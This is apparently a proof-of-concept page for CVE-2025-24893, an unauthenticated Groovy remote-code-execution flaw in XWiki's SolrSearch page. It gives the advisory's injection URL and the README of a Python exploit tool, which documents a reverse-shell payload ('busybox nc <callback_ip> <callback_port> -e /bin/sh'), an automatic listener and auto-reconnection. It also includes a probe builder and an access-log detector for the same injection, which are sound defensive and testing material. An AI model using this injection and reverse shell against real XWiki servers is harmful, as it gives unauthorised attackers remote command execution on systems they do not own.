
CVE-2025-24893 PoC — Remote code execution as guest via SolrSearchMacros request in xwiki

Associated Vulnerability
Title: Remote code execution as guest via SolrSearchMacros request in xwiki (CVE-2025-24893)
Description: XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.
Readme
# CVE-2025-24893 - XWiki Platform Remote Code Execution

A Python exploit for CVE-2025-24893, a remote code execution vulnerability in XWiki Platform. This exploit includes a self-contained reverse shell listener using pwntools.

## Description

This exploit targets XWiki Platform installations vulnerable to CVE-2025-24893. The `text` parameter of the `Main.SolrSearch` page, which is reachable without authentication and rendered as an RSS feed when `media=rss` is given, is passed into the wiki renderer unescaped. A request can therefore close the surrounding wiki markup with `}}}` and open its own `{{async}}{{groovy}}...{{/groovy}}{{/async}}` macros, so a guest request runs arbitrary Groovy, and through it arbitrary OS commands, with the privileges of the XWiki server process. The exploit automatically starts a reverse shell listener and provides an interactive shell upon successful exploitation.

## Requirements

- Python 3.x
- `requests` library
- `pwntools` library

## Installation

### Recommended: Using UV (Modern Python Package Manager)

```bash
# Install UV if you don't have it
curl -LsSf https://astral.sh/uv/install.sh | sh

# Create and activate a virtual environment first: `uv pip install` refuses to
# install into the system interpreter unless a venv is active or --system is given
uv venv && source .venv/bin/activate

# Install dependencies
uv pip install requests pwntools
```

### Alternative: Using pip

```bash
pip install requests pwntools
```

## Usage

### Basic Usage

```bash
python3 CVE-2025-24893.py <target_url>
```

### Examples

```bash
# Basic usage: the listener binds to the default 0.0.0.0:9521, but the same
# address is embedded in the payload as the connect-back target, so use this
# form only against an instance running on the same host; otherwise pass -i
python3 CVE-2025-24893.py example.com

# Custom callback IP and port (the IP must be reachable from the target)
python3 CVE-2025-24893.py example.com -i 192.168.1.100 -p 4444

# Skip initial test and go straight to reverse shell
python3 CVE-2025-24893.py example.com --no-test

# Custom reconnection attempts
python3 CVE-2025-24893.py example.com --max-reconnects 10

# Full custom configuration
python3 CVE-2025-24893.py example.com -i 10.0.0.5 -p 8080 --no-test --max-reconnects 3
```

### Command Line Arguments

- `target`: Target URL (required)
  - Can be domain only: `example.com`
  - Can include protocol: `http://example.com` or `https://example.com`

- `-i, --ip`: Callback IP for reverse shell (default: 0.0.0.0)
  - The value serves two roles: it is the address the pwntools listener binds to, and it is the address written into the payload (`busybox nc <ip> <port>`)
  - `0.0.0.0` binds the listener to all interfaces, but a target told to connect to `0.0.0.0` connects to its own loopback, so the default only works when the target runs on the attacking host; for any remote target give a specific IP the target can route to (e.g., `192.168.1.100`)

- `-p, --port`: Callback port for reverse shell (default: 9521)

- `--no-test`: Skip the initial test and go straight to reverse shell

- `--max-reconnects`: Maximum reconnection attempts when shell drops (default: 5)

## How It Works

1. **Protocol Detection**: Automatically detects if the target supports HTTP or HTTPS
2. **Test Phase**: Runs a test command (`id`) to verify the exploit works
3. **Listener Setup**: Automatically starts a reverse shell listener using pwntools
4. **Payload Execution**: Sends the reverse shell payload to the target
5. **Interactive Shell**: Provides an interactive shell upon successful connection
6. **Auto-Reconnection**: Automatically re-establishes connection if shell drops
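The protocol-detection and test steps above reduce to two pieces of logic: build the advisory's harmless probe request, and decide from the RSS response whether the injected Groovy actually ran (the marker `Hello from search text:42` is only present if the server computed `23 + 19`). The following is an added example for this page, not the project's `CVE-2025-24893.py` and not XWiki code; the host `wiki.example.org` and both RSS bodies are constructed, and `probe()` only touches the network when the file is run directly.

```python
"""Build the CVE-2025-24893 probe request and verify whether the Groovy macro ran."""
import sys
import urllib.request
import xml.etree.ElementTree as ET
from urllib.parse import quote, urlencode

# Harmless probe from the advisory: "}}}" closes the wiki-syntax group the
# SolrSearch template has open, then an async+groovy macro prints a marker
# that only appears if Groovy executed (23 + 19 is computed server-side).
PROBE_PAYLOAD = (
    "}}}{{async async=false}}{{groovy}}"
    'println("Hello from" + " search text:" + (23 + 19))'
    "{{/groovy}}{{/async}}"
)
EXPECTED_MARKER = "Hello from search text:42"


def build_probe_url(target: str) -> str:
    """Return the unauthenticated GET that renders the probe through Main.SolrSearch as RSS.

    `target` may be a bare host (http:// is assumed, as the README allows) or a full URL.
    """
    base = target if target.startswith(("http://", "https://")) else "http://" + target
    # quote_via=quote percent-encodes braces, spaces and "/" the way the advisory URL does.
    query = urlencode({"media": "rss", "text": PROBE_PAYLOAD}, quote_via=quote)
    return f"{base.rstrip('/')}/xwiki/bin/get/Main/SolrSearch?{query}"


def rss_titles(body: str) -> list[str]:
    """Collect every <title> in an RSS document; a non-XML body (error page) yields no titles."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return []
    return [(t.text or "") for t in root.iter("title")]


def is_vulnerable(body: str) -> bool:
    """True only when a feed title carries the marker the injected Groovy computed."""
    return any(EXPECTED_MARKER in title for title in rss_titles(body))


# Constructed sample responses (hand-written for this example, not captured from a live wiki).
SAMPLE_VULNERABLE = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"><channel>
<title>Hello from search text:42</title>
<link>http://wiki.example.org/xwiki/bin/view/Main/SolrSearch</link>
<description>Search results</description>
</channel></rss>"""

# A fixed instance emits the search text literally instead of rendering it.
SAMPLE_PATCHED = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"><channel>
<title>Search: }}}{{async async=false}}{{groovy}}println("Hello from" + " search text:" + (23 + 19)){{/groovy}}{{/async}}</title>
<link>http://wiki.example.org/xwiki/bin/view/Main/SolrSearch</link>
</channel></rss>"""


def probe(target: str, timeout: float = 10.0) -> bool:
    """Send the probe to a live instance. Only for hosts you are authorised to test."""
    with urllib.request.urlopen(build_probe_url(target), timeout=timeout) as resp:
        return is_vulnerable(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    print("vulnerable" if probe(sys.argv[1]) else "marker not found (patched, or probe not rendered)")
```

Checking the marker inside a `<title>` element rather than anywhere in the body matters: a patched instance still echoes the raw probe text into the feed, so a naive substring search for `Hello from` would report a false positive.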

## Self-Contained Reverse Shell

This exploit is self-contained and does not require manual netcat setup:

- Automatically starts a listener on the specified IP and port
- Handles the reverse shell connection automatically
- Provides an interactive shell interface
- No need to manually run `nc -lvp <port>`

## Automatic Reconnection

The exploit includes robust reconnection capabilities:

- **EOF Handling**: Automatically detects when shell connection drops
- **Auto-Recovery**: Re-establishes listener and re-sends exploit payload
- **Configurable Retries**: Set maximum reconnection attempts (default: 5)
- **Graceful Degradation**: Continues until max attempts reached

### Reconnection Behavior

When the shell connection drops (EOF error):
1. Detects the connection loss
2. Closes the old listener
3. Starts a new listener
4. Re-sends the exploit payload
5. Re-establishes the shell connection
6. Continues interactive session

## Payload Details

The exploit injects `{{async}}{{groovy}}` macros through the `text` parameter of `Main.SolrSearch` (the same entry point as the advisory's probe) and uses Groovy to run a shell command. The reverse shell command it executes is:
```bash
busybox nc <callback_ip> <callback_port> -e /bin/sh
```
The Groovy execution itself needs nothing on the target, but this command does: `busybox` must be installed and its `nc` applet built with `-e` support. If the `id` test phase returns output but no shell arrives, that dependency is the first thing to check.
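From the defender's side, the request this payload rides on is distinctive in a web-server access log: a hit on `Main/SolrSearch` whose query string, once percent-decoded, opens script-capable macros such as `{{async` or `{{groovy`. The detector below is an added example for this page, not part of the project or of XWiki; the combined-format log lines are constructed, the client addresses are documentation-range IPs, and the macro list is a reasonable starting set rather than anything the advisory enumerates.

```python
"""Flag access-log requests that inject XWiki macros through Main.SolrSearch (CVE-2025-24893)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line and status code from a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# The search page the advisory names; both the "get" and "view" actions render it.
SOLRSEARCH_RE = re.compile(r"/Main/SolrSearch(?:/|$)")
# Script-capable (and content-pulling) macros nobody should open from a search box.
# Assumption for this example: the set is illustrative, extend it to taste.
MACRO_RE = re.compile(
    r"\{\{\s*/?\s*(async|groovy|velocity|python|script|include|display)\b", re.IGNORECASE
)


def fully_decoded(value: str, rounds: int = 3) -> str:
    """Undo stacked percent-encoding (a common evasion); stop once the text stops changing."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value


def injected_macros(target: str) -> list[str]:
    """Return the macro names found in any query parameter of a SolrSearch request."""
    parts = urlsplit(target)
    if not SOLRSEARCH_RE.search(parts.path):
        return []
    found = set()
    # parse_qs already decodes one layer; inspect every parameter, not only `text`.
    for values in parse_qs(parts.query, keep_blank_values=True).values():
        for value in values:
            found.update(m.group(1).lower() for m in MACRO_RE.finditer(fully_decoded(value)))
    return sorted(found)


def scan_log(lines) -> list[dict]:
    """Walk log lines and report each SolrSearch request that carries macro injection."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        macros = injected_macros(m.group("target"))
        if macros:
            hits.append({
                "client": line.split(" ", 1)[0],
                "target": m.group("target"),
                "status": int(m.group("status")),
                "macros": macros,
            })
    return hits


# Constructed sample log (hand-written; clients use documentation-range addresses).
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Mar/2025:12:00:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=release%20notes HTTP/1.1" 200 2311 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2025:12:00:02 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22x%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 1187 "-" "python-requests/2.32.3"',
    '198.51.100.4 - - [10/Mar/2025:12:00:03 +0000] "GET /xwiki/bin/view/Main/SolrSearch?text=%7B%7Bhelp HTTP/1.1" 200 9402 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2025:12:00:04 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%257D%257D%257D%257B%257Bgroovy%257D%257D HTTP/1.1" 200 1190 "-" "curl/8.5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['client']} status={hit['status']} macros={','.join(hit['macros'])} {hit['target'][:80]}")
```

The third sample line shows why the rule keys on macro names rather than on `{{` alone: a user searching for wiki syntax produces braces in the query string without opening anything dangerous. The fourth line is double-encoded; XWiki would not execute it, but an attempt is still worth an alert, which is what the decoding loop buys.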

## Features

- **Automatic Protocol Detection**: Detects HTTP/HTTPS automatically
- **Self-Contained Listener**: No manual netcat setup required
- **Interactive Shell**: Full interactive shell upon successful exploitation
- **Test Mode**: Optional test phase to verify exploit works
- **Flexible Configuration**: Customizable callback IP and port
- **Auto-Reconnection**: Handles connection drops automatically
- **Robust Error Handling**: Graceful handling of various error conditions

## Troubleshooting

### Common Issues

1. **"Address already in use"**: Another process holds the listener port; change it with the `-p` flag
2. **"Permission denied"**: Ports below 1024 need root; use a port of 1024 or above, or run with sudo
3. **No connection received**: 
   - Verify the target is vulnerable (the test phase, or the advisory's `Hello from search text:42` probe)
   - Check that the callback IP is one the target can actually reach (see the note on `-i` above)
   - Ensure no firewall is blocking the connection
   - Confirm `busybox` with `nc -e` support exists on the target, since the payload relies on it
4. **"Got EOF while sending in interactive"**: 
   - The script will automatically handle this and re-establish connection
   - If persistent, check network stability or increase `--max-reconnects`

### Network Considerations

- The callback IP must be reachable from the target; prefer a specific interface address over `0.0.0.0`, which is fine for binding the listener but not as a destination for the target
- For external targets, the listener must be exposed on a public IP or port-forwarded to one
- Unstable networks may require higher reconnection limits

## Disclaimer

This tool is for educational and authorized testing purposes only. Always ensure you have proper authorization before testing any systems.

## Credits

- **Author**: nopgadget
- **Based on**: Original script by Al Baradi Joy

## License

This project is for educational purposes only. Use responsibly and only on systems you own or have explicit permission to test. 
File Snapshot

[4.0K] /data/pocs/4bc4f9df59accdc479e9c7fceb303aeaad7b5344
├── [9.0K] CVE-2025-24893.py
└── [5.2K] README.md

0 directories, 2 files